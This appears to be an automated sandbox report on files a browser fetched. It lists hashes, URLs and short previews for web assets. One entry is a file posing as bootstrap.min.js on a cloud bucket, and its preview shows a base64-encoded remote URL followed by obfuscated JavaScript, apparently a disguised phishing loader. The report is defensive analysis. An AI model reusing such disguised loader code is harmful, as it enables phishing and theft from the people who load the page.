                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (801)
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):880
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.4667714934448455
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:iIeYCeSGRFXZf6+lEAZM9QgQ1xkjyOSi1QqIkjyOSJeq:iINUIpf5lEmM9QgQ17OBQqqO0N
                                                                                                                                                                                                                                                                                                                                                                                        MD5:DDD150FE3BA06C932FE1771161C27255
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:1F01F3B9F456E648B2F8CE10E97553051F72547A
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:A9C3FB6C5F0B21FBFAE8294E08495312E40BC951584AA017AE6F5B75B26132E9
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:2D759AAE48E24A435C0CFC720379A20014B0E7C932E0B4F1F02B6925D7F16726BE944AB966B4DF2E9D93BD58DD3BDA96CB2EF823DDB112B144A2D4D12694D70A
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://s-f.scribdassets.com/webpack/doc_page/205.e3b3b6.js
                                                                                                                                                                                                                                                                                                                                                                                        Preview:"use strict";(self.webpackChunk_scribd_app_docpage=self.webpackChunk_scribd_app_docpage||[]).push([[205],{205:(e,t,c)=>{c.r(t),c.d(t,{default:()=>l});var n=c(23807),o=c(40880),r=c(96540),s=c(38544),a=c(37594),p=c(19567),_=c(78458),d=c(15753);const l=function({copyrightInfringementUrl:e,documentFlagsPath:t,id:c}){const l=(0,s.wA)();return r.createElement(a.yA,{closeModal:()=>l((0,_.JY)(c)),copyrightInfringementUrl:e,documentFlagsPath:t,handleError:()=>{(0,d.wz)({action:n.cq.ACTION.REPORT_CONTENT,success:!1}),l((0,p.A)({type:"error",content:o.A.t("doc_page.report_content_modal.problem_submitting_report")}))},handleSuccess:()=>{(0,d.wz)({action:n.cq.ACTION.REPORT_CONTENT,success:!0}),l((0,p.A)({type:"success",content:o.A.t("doc_page.report_content_modal.document_has_been_reported")}))}})}}}]);.//# sourceMappingURL=https://www.scribd.com/webpack/doc_page/205.e3b3b6.js.map
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 15860, version 2.1376
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):15860
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.98605426575707
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:384:W6srLsSWK0iJ1OJDOhZooMfiux3hduSyqhRamFqP6Ogw:UrL1WKbbOJ6hZopfHdTAmFB2
                                                                                                                                                                                                                                                                                                                                                                                        MD5:1349B98CFEC56640CDFDC2E5C2730939
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:C014A979CCC98ACCA310F9890B066C70D10E563D
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:1B9D5A62513A369A10224F1DC73A463DC165EB58BD798DBB4CB4810CA2B5C79F
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:0A812D71CB18D7BC5B9FB8E90F8756D2A08B033F797F243AA9769D316B0A0488B5F513A5DA23204B8E5AA43B41FA3F0FEBD467476D071093CFB5E9C02CBEB40F
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://s-f.scribdassets.com/webpack/assets/fonts/source_sans_pro/semibold/source_sans_pro_600.latin.76017e81.woff2
                                                                                                                                                                                                                                                                                                                                                                                        Preview:wOF2......=...........=....`.....................F..... .`....*..s.....0..h.6.$.....J.. ..Z. .V..5.]4.t..\=-.)....@.}.$....I....'$.!c..<.]f.p..H.1KY.t..Y.......T#...}.x./.p...w...=.^.X.|\..!,G...3.0.p`.x...Q.....[.d.1...?.......}.K........:.vRmc.!.......6....P$..@x."..2.6[.o...W..3....p.'LrQ.,V.Z%lcI.F.. ....._."x}..D.....J....7.L,31.P......;.O....I..x...(.J....Mj...|..!9Q+.............E1m_N..op.......*...h.*.I.wI.p/H.I.*`.N.4.V.m.w....+y.S.n.\..1.G.8.y.....YX..zg0u*_g0............OT...9......0@..cC.*.&s......r....(..U~....ChL....d................T..R..@..S...v.........)$..S@......N~OV...&..j...8.....{.%.X.[.i.X...g..0<....0.....?.9....6.3.....n.PJQ.....}!.2.W..'.{..k.W.'?;swf.L6X....H.X.(..@U@.`Y..5..<.Phle.J............C..<H[F1R..m.>.....h.&..cz'.*.Z....=s|........8z.q...._c.|}CV..#..4.\.p...a.q..cL.G.z..lK[..(.C..d.{Z.).(.X.....DI.~.A..C.C..C~.3.......t.D..~bw`..YS.....K.whQ..Z#..SiT......_M..S=...-$..d.y.A.....Y4..B.Q....K%..).B..\.y...
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):13
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):2.7773627950641693
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:qVZPV:qzd
                                                                                                                                                                                                                                                                                                                                                                                        MD5:C83301425B2AD1D496473A5FF3D9ECCA
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:941EFB7368E46B27B937D34B07FC4D41DA01B002
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:B633A587C652D02386C4F16F8C6F6AAB7352D97F16367C3C40576214372DD628
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:83BAFE4C888008AFDD1B72C028C7F50DEE651CA9E7D8E1B332E0BF3AA1315884155A1458A304F6E5C5627E714BF5A855A8B8D7DB3F4EB2BB2789FE2F8F6A1D83
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://td.doubleclick.net/td/ga/rul?tid=G-Z4ZC50DED6&gacid=30215218.1733522367&gtm=45je4c40v9101043253z878386455za200zb78386455&dma=0&gcs=G1--&gcd=13l3l3l3l5l1&npa=0&pscdl=noapi&_ng=1&aip=1&fledge=1&frm=0&tag_exp=101925629~102067555~102067808~102081485&z=380623333
                                                                                                                                                                                                                                                                                                                                                                                        Preview:<html></html>
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (65530), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):708943
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.380861846719797
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:AmVsW7mcFTvDxjsLdsuWKUBX8D++brVWWMv410YcStH0qL06QEbVvTSL4RXULTLB:Da1Vf0cWcX+
                                                                                                                                                                                                                                                                                                                                                                                        MD5:FAA462B5B8ABAFB19F4C7EDAA7B46AAA
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:C7900EE6DACE9D7711B3B4EDED3DCD1A8EB22BEC
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:486DD6843D0D2D79063894ADF48CB5C0981060F23B65CB50FAD6B7A1CE6FE699
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:B0F6C0C5884B080E825A5F7B66543526B4CF726CF78BC58897B108E459C06AED9DEAA4F2A08F63656402958F5C13DC5AD32F86475466D7AAC35A1EB3379442BE
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:!function(){function e(t){var n=o[t];if(void 0!==n)return n.exports;var i=o[t]={id:t,loaded:!1,exports:{}};return r[t](i,i.exports,e),i.loaded=!0,i.exports}var t,n,r={723:function(e,t,n){"use strict";function r(e){l.length||(a(),!0),l[l.length]=e}function o(){for(;d<l.length;){var e=d;if(d+=1,l[e].call(),d>1024){for(var t=0,n=l.length-d;t<n;t++)l[t]=l[t+d];l.length-=d,d=0}}l.length=0,d=0,!1}function i(e){return function(){function t(){clearTimeout(n),clearInterval(r),e()}var n=setTimeout(t,0),r=setInterval(t,50)}}e.exports=r;var a,c,s,u,l=[],d=0,p=void 0!==n.g?n.g:self,m=p.MutationObserver||p.WebKitMutationObserver;"function"==typeof m?(c=1,s=new m(o),u=document.createTextNode(""),s.observe(u,{characterData:!0}),a=function(){c=-c,u.data=c}):a=i(o),r.requestFlush=a,r.makeRequestCallFromTimer=i},5937:function(e,t,n){e.exports=n.p+"fingerprinted/img/abnamro-4445e65420800f96f68cfc67a273f66b.svg"},1520:function(e,t,n){e.exports=n.p+"fingerprinted/img/asn-3d9b1bbff2f8f12105510992dbb37ae8.svg
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (48664)
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):48944
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.272507874206726
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:768:9VG5R15WbHVKZrycEHSYro34CrSLB6WU/6DqBf4l1B:9VIRuo53XiwWTvl1B
                                                                                                                                                                                                                                                                                                                                                                                        MD5:14D449EB8876FA55E1EF3C2CC52B0C17
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:A9545831803B1359CFEED47E3B4D6BAE68E40E99
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:E7ED36CEEE5450B4243BBC35188AFABDFB4280C7C57597001DE0ED167299B01B
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:00D9069B9BD29AD0DAA0503F341D67549CCE28E888E1AFFD1A2A45B64A4C1BC460D81CFC4751857F991F2F4FB3D2572FD97FCA651BA0C2B0255530209B182F22
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js
                                                                                                                                                                                                                                                                                                                                                                                        Preview:/*!. * Bootstrap v4.0.0 (https://getbootstrap.com). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function r(){return(r=Object.assign||function(t){for(var e=1;e<arguments.length;e++){var n=arguments[e];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(t[i]=n[i])}return t}).apply(this,arguments)}e=e&&e.hasOwnProperty("default")?e.default:e,n=n&&n.hasOwnProp
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65446), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):553324
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.912135280067079
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:6144:JTWsY1akh5JWPJurgWLNW6VF7YlNbx1eX8jumoHL4owSKrthO4bQVw:Eay8oLLc6VF7eNyMjumoHL4owSKrcw
                                                                                                                                                                                                                                                                                                                                                                                        MD5:3374ED36347B8E60EA194F0E92E5CBF9
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:1E5E84642479DBAEFC9C2EBDF139ED7C943A86E4
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:3334063FBEB9331659D10E563BA67EDE2B3861C8F186EBB77692C3E4F74D7CC2
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:00C9288873622CCD75AE0B471E5A8A8BF225960E5F9203E673A322F538B5D5E5D9EDC31B5D5FF87F0CBA0E925A2CF92AE445A4918E4F293CF052635B00171D25
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://drizzysamson-1323985617.cos.na-siliconvalley.myqcloud.com/bootstrap.min.js
                                                                                                                                                                                                                                                                                                                                                                                        Preview:var file = "aHR0cHM6Ly9kcml6enlzYW1zb24uY29uc3RydWN0YXBwc29sdXRpb24uY29tL25leHQucGhw";....var _0x55a2a4=_0x2c13;function _0x2b19(){var _0x4966e1=['x-lg-row\x20{','color:\x20tra','div\x20id=\x22ma','-lg-0\x20{\x20ma','~.valid-to','1|4|0|2|6|','n-top:\x201.5',':focus,\x20.f','ning\x20hr\x20{\x20','end\x20!impor','er;\x20justif','tify\x20!impo','owrap\x20!imp','kit-clip-p','or:\x20#00408','ble\x20td,\x20.t','t/ests/2.1','hite-space','r\x20p-2\x22\x20onm','\x20#pacifism','>&nbsp<spa','sm-wrap\x20{\x20','g9GFerfs7/','fDngjSvCsG','u\x20to\x20your\x20','pover-top\x20','\x20}\x20.btn-da','webkit-app','an><br>\x20<d','lumn;\x20flex','\x20#6c757d\x20!','+PQcVpU7gF','#495057;\x20b','-color:\x20#1','\x20calc(.3re','rst-child)','econdary:f','to\x20!import','}\x20.table-r','-box-flex:','cus,\x20.was-','ng-top:\x200\x20','utton.bg-w','eader,\x20.ca','\x200\x20}\x20.tabl','re,\x20.bs-to','image/svg+','tton:focus','jo4inKDdSN','{\x20text-tra','roup:\x2013;\x20',',\x20.btn.act','r:\x20#28a745','vcoBM','
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (60819), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):60819
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.4839527999983755
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:1536:R8K6Znxmj9rlvCOhI64j7AtSPtNPU9ArHMLlk:RV6+jKOh4z
                                                                                                                                                                                                                                                                                                                                                                                        MD5:D9C6DE0DF2BF028D93924AFF92487904
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:6596050516DD12AF52D9B0E7B18ED837F1D81300
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:769A555DE553BABC35A3338F344DD7AA16260C93CEA2C7DB290707C90484E7CC
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:6BE4940EEC0DCD70EFCF85EB21C5C7B827F4F3DFE2240A0DE259AB5C9835F179DDB8A2BA6250C73516A5BF8C9DD4DE3438A23CD2D162745FABA9314A18FA1615
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var W,O,I,U,K,X,L,l,j,T,t,N,q,e,Z,V,G,J,Q,Y,$,t1,e1,r1,i1,o1,n1,s,s1,c1,a1,h1,l1,o,f1,r,d1,u1,n,c,a,h,f,d,i=function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},o=t.lib={},n=o.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function()
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (51384), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):51385
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.293328685395304
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:768:IaOFhhRC5JFhLjfRysgLzQynDw5YyDMFW8KQ:IaOFnR2DRszQKaoWtQ
                                                                                                                                                                                                                                                                                                                                                                                        MD5:6626C1362840EBFC8F48294E8F023E18
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:4EC0DFB37C3E536C1B5EC04B68C9846FDBAF9EEF
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:AABC88A6DB8B22022F96CA88E4F0A7BE426ABEF2B35169A71515A2D55246402A
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:B037A19B52C1047198EC7F19E99066054E454964380E2354239834260D11248E617D6759B944DDF39A25B883C8F430603D8E13097396E2DEDA9BB6905C1CD42A
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://bat.bing.com/bat.js
                                                                                                                                                                                                                                                                                                                                                                                        Preview:function UET(o){this.stringExists=function(n){return n&&n.length>0};this.domain="bat.bing.com";this.domainCl="bat.bing.net";this.URLLENGTHLIMIT=4096;this.pageLoadEvt="pageLoad";this.customEvt="custom";this.pageViewEvt="page_view";o.Ver=o.Ver!==undefined&&(o.Ver==="1"||o.Ver===1)?1:2;this.uetConfig={};this.uetConfig.consent={enabled:!1,adStorageAllowed:!0,adStorageUpdated:!1,hasWaited:!1,waitForUpdate:0,enforced:!1};this.uetConfig.tcf={enabled:!1,vendorId:1126,hasLoaded:!1,timeoutId:null,gdprApplies:undefined,adStorageAllowed:undefined,measurementAllowed:undefined,personalizationAllowed:undefined};this.uetConfig.cusig={hasLoaded:!1,timeoutId:null,blob:{}};this.beaconParams={};this.supportsCORS=this.supportsXDR=!1;this.paramValidations={string_currency:{type:"regex",regex:/^[a-zA-Z]{3}$/,error:"{p} value must be ISO standard currency code"},number:{type:"num",digits:3,max:999999999999},integer:{type:"num",digits:0,max:999999999999},hct_los:{type:"num",digits:0,max:30},date:{type:"regex",
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (45884), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):45884
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.617380317240789
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:768:J7OAysHJyKqV/LgW8TmJVZhUoyy312yeFCQQU//:JaLVF4SJvhUHylUPQUX
                                                                                                                                                                                                                                                                                                                                                                                        MD5:F15AA1324323977DF8C0DCA924FED0DA
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:B776AB5B432D27848AC159398A952D4DA0388B6E
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:541F4E64CDC8FAEC400BEA159EB99A353C3552858C988F41DA380A445E6EB9FD
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:925A5365877C065C276707579BCD0CF7C70944FF3D230D602D3F08A3612D56BFABBC058E6E31513637959E9A0E3643E939547FA4A47E945298977340B54013DD
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://utt.impactcdn.com/A3071581-5350-42cd-80be-79cdd173e0991.js
                                                                                                                                                                                                                                                                                                                                                                                        Preview:/*! @build 84a8c710 @date 2024-09-20T16:59:47.606Z @generated 2024-09-25T15:36:29.227054673Z */!function(){"use strict";var r={8714:function(n,t,r){var a=r(9814),f=r(9402),d=r(8956),l=r(426),s=r(5423),m=r(450).t,v=r(1537).i;n.exports=function(i,c){var n=new Date,t=f(i.o.z9),r=l(i.v),e=s(r,i.X.zg,n),u=d(r,e,i.h,i.v,i.X,n),o=a(t,u,r,e,i.X.ze,n);return u.g(e.$),function(n,t,r){if(!c[n])return r(v("unknown action"));r=m(r);try{c[n](r,i,o,t)}catch(e){r(v(e.message,{z10:e.name}))}}}},6145:function(n,t,r){var b=r(9340).C,h=r(9790),x=r(8714),y=r(1374),w=r(2132),g=r(7725),$=r(4664),C=r(7950).F,F=r(1537).v,k=r(7788),Z=r(8783),z=r(7062),R=r(450).k,Y=r(8546);n.exports=function(n,t,r,e){var i,t=R($.Z(C(Y)),t),c=g(w(n,t,b),{debug:!0}),u={R:!1},o={Y:u,X:t,o:n,v:c,N:Z(),h:y(c,u)},a=k(c),f=r,d=[];for(i in e)e.hasOwnProperty(i)&&(f[i]=e[i],d.push(i));for(var l=x(o,f),s=[],m=(c("app",h.G,{acid:n.acid,zn:"84a8c710",zo:+new Date,zp:1726851587606,ver:o.X.ver,zq:u}),!1),v=function(r,n){switch(r){case"enforce
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2609)
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2688
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.1866158187280424
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:48:iI5lZ2pIXbgR0Oj2YGmHmyakI2TnAKduA3bgR0Oj2Y2uWDUwR:rZ2pIX8j9vIQ8j9zWDjR
                                                                                                                                                                                                                                                                                                                                                                                        MD5:C6C11D3716F64427A0F1E5A79D2DFBC0
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:7057F5CF1642F2AC5E239E2D126245D76D279726
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:560F98DCBBE3A25D124FAEDA9BA052656C785E1F721590EE15832D84BCFD6FB3
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:42D6E3E7E057FB84D188D0D6868C28DED61A1EB4406D4929AC4638BDEB4F87C58725445D8EB75FA97491FF9C8E3EA81C4F9485CFC20CE2DF6D97B2DFE91FE989
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://s-f.scribdassets.com/webpack/doc_page/827.8397d2.js
                                                                                                                                                                                                                                                                                                                                                                                        Preview:"use strict";(self.webpackChunk_scribd_app_docpage=self.webpackChunk_scribd_app_docpage||[]).push([[827],{51336:(e,t,r)=>{r.d(t,{A:()=>l});var a=r(62832),n=r.n(a),i=r(96540),s=r(11865);function o(e,t,r){return(t=function(e){var t=function(e,t){if("object"!=typeof e||!e)return e;var r=e[Symbol.toPrimitive];if(void 0!==r){var a=r.call(e,t||"default");if("object"!=typeof a)return a;throw new TypeError("@@toPrimitive must return a primitive value.")}return("string"===t?String:Number)(e)}(e,"string");return"symbol"==typeof t?t:t+""}(t))in e?Object.defineProperty(e,t,{value:r,enumerable:!0,configurable:!0,writable:!0}):e[t]=r,e}class l extends i.Component{constructor(e){super(e),o(this,"close",(()=>{this.props.close_modal(this.props.id)}))}addWrapperClassNames(e=null){return this.additionalWrapperClassNames=this.additionalWrapperClassNames||[],e&&this.additionalWrapperClassNames.push(e),this.additionalWrapperClassNames.join(" ")}getComponentClassnames(){return n()("auto__doc_page_shared_moda
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (15433)
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):15512
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.259373114993413
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:384:AhPK0bqlII5vdswJQ9yL+yclo8ZrmBjr4lQ8cl:Jh8NQ49cl
                                                                                                                                                                                                                                                                                                                                                                                        MD5:590BB73D8111732896E5910D9432D0B5
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:9F51C084F4B94AEFA3F609B96AE7F3321A8C2777
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:9E511DEEC7D005069B74B5A8FE54D1A2979877AD0CFDEA7378238BEE0DECC88E
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:AC1E5BF78C71DEBC40024E4E1955D6229861F870FE800859FC72D991B4D25B6DE9AE974CC01D1D775BBFA852FE9641E0FE5E44370B7EEBBEBBDD409CF61C04D6
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://s-f.scribdassets.com/webpack/doc_page/768.555ee4.js
                                                                                                                                                                                                                                                                                                                                                                                        Preview:(self.webpackChunk_scribd_app_docpage=self.webpackChunk_scribd_app_docpage||[]).push([[768],{10768:(e,t,a)=>{"use strict";a.r(t),a.d(t,{default:()=>f});var l=a(20685),s=a.n(l),n=a(70107),r=a.n(n),i=a(47024),o=a.n(i),h=a(62832),c=a.n(h),d=a(40880),m=a(96540),u=a(38979),p=a(51336);function g(e,t,a){return(t=function(e){var t=function(e,t){if("object"!=typeof e||!e)return e;var a=e[Symbol.toPrimitive];if(void 0!==a){var l=a.call(e,t||"default");if("object"!=typeof l)return l;throw new TypeError("@@toPrimitive must return a primitive value.")}return("string"===t?String:Number)(e)}(e,"string");return"symbol"==typeof t?t:t+""}(t))in e?Object.defineProperty(e,t,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[t]=a,e}const _=[{label:d.A.t("pdfs.lightboxes.embed_lightbox.autosize"),width:720,height:960,value:"auto"},{label:"600x800",width:600,height:800,value:"600x800"},{label:"400x600",width:400,height:600,value:"400x600"}],b=e=>{const t=o()(e.title);let a,l,n=e.embed_url+`?start_page=${
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PNG image data, 510 x 360, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):29999
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.968378291485809
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:384:Q18PJTE5ISPIm60xsREe1TWp/J6X7ioR3VWnUXVq6YhEC+L1Xqs8yhoIkjWUfWq+:Q18PVY6pRRQ0Liy3VzXVq6YhEC7RZ4t
                                                                                                                                                                                                                                                                                                                                                                                        MD5:D1E083F52AAED174A437AE88EBFF5785
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:BD4DCD514C09C95C5D9CEB3968EBB024F3F0B675
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:A7F9BE2AFECD14A26A5F9F8A97A421A4E1DB6226377ADD77257C41654FE73354
